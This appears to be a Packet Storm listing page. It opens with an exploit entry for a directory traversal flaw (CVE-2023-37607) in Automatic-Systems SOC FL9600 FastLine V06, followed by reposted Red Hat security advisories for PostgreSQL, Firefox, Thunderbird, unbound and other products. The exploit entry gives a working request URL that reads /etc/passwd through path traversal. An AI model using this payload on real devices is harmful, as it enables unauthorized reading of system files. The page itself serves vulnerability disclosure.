Automatic-Systems SOC FL9600 FastLine version V06 suffers from a directory traversal vulnerability.

Change Mirror Download

    # Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal# Google Dork: # Date: 12/9/2023# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure# Vendor Homepage: http://automatic-systems.com# Software Link: # Version: V06# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a# CVE : CVE-2023-37607Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd

Automatic-Systems SOC FL9600 FastLine Directory Traversal

Red Hat Security Advisory 2024-0998-03 - Red Hat OpenShift distributed tracing 3.1.0.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0998.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: Red Hat OpenShift distributed tracing 3.1.0 operator/operand containersAdvisory ID:        RHSA-2024:0998-03Product:            Red Hat OpenShift distributed tracingAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0998Issue date:         2024-02-27Revision:           03CVE Names:          CVE-2023-26159====================================================================Summary: Red Hat OpenShift distributed tracing 3.1.0Red Hat Product Security has rated this update as having a security impact of "Low". A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Release of Red Hat OpenShift distributed tracing provides these changes: OpenTelemetry: support for target allocator. Tempo: Monolithic CRD, alerting for span RED metrics, TraceQL support for gateway. OpenTelemetry version 0.93.0. Tempo 2.3.1, Jaeger 1.53.0.Security Fix(es):CVE-2023-26159 follow-redirects: Improper Input Validation due to the improper handling of URLs by the url.parse()Solution:CVEs:CVE-2023-26159References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2256413https://issues.redhat.com/browse/TRACING-3135https://issues.redhat.com/browse/TRACING-3573https://issues.redhat.com/browse/TRACING-3717https://issues.redhat.com/browse/TRACING-3718https://issues.redhat.com/browse/TRACING-3719https://issues.redhat.com/browse/TRACING-3746https://issues.redhat.com/browse/TRACING-3756https://issues.redhat.com/browse/TRACING-3786https://issues.redhat.com/browse/TRACING-3787https://issues.redhat.com/browse/TRACING-3808https://issues.redhat.com/browse/TRACING-3810

Red Hat Security Advisory 2024-0998-03

Red Hat Security Advisory 2024-0992-03 - An update for rh-postgresql10-postgresql is now available for Red Hat Software Collections.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0992.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-postgresql10-postgresql security updateAdvisory ID:        RHSA-2024:0992-03Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0992Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for rh-postgresql10-postgresql is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0992-03

Red Hat Security Advisory 2024-0990-03 - An update for rh-postgresql12-postgresql is now available for Red Hat Software Collections.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0990.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-postgresql12-postgresql security updateAdvisory ID:        RHSA-2024:0990-03Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0990Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for rh-postgresql12-postgresql is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS). Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0990-03

Red Hat Security Advisory 2024-0989-03 - Red Hat Multicluster GlobalHub 1.0.2 General Availability release images, which fix bugs, provide security updates, and update container images. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0989.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat Multicluster GlobalHub 1.0.2 bug fixes and security updatesAdvisory ID:        RHSA-2024:0989-03Product:            multicluster-globalhubAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0989Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-49568====================================================================Summary: Red Hat Multicluster GlobalHub 1.0.2 GeneralAvailability release images, which fix bugs, provide security updates, and update container images.Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE links in the References section.Description:Red Hat Multicluster GlobalHub 1.0.2 imagesThis advisory contains the container images for Red Hat MulticlusterGlobalHub, which fix several bugs.Security fix(es):CVE-2023-49568 go-git: Maliciously crafted Git server replies can cause DoS ongo-git clientsCVE-2023-49569 go-git: Maliciously crafted Git server replies can lead to pathtraversal and RCE on go-git clientsSolution:https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html-single/multicluster_global_hub/indexCVEs:CVE-2023-49568References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2258143https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0989-03

Red Hat Security Advisory 2024-0988-03 - An update for rh-postgresql13-postgresql is now available for Red Hat Software Collections.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0988.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-postgresql13-postgresql security updateAdvisory ID:        RHSA-2024:0988-03Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0988Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for rh-postgresql13-postgresql is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS). Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0988-03

Red Hat Security Advisory 2024-0984-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0984.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0984-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0984  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.8.0.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0984-03

Red Hat Security Advisory 2024-0983-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0983.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0983-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0983  
Issue date:         2024-02-27  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0983-03

Red Hat Security Advisory 2024-0982-03 - An update for unbound is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0982.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:0982-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0982Issue date:         2024-02-27Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-0982-03

Red Hat Security Advisory 2024-0981-03 - An update for unbound is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0981.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:0981-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0981Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-50387====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Tag

#vulnerability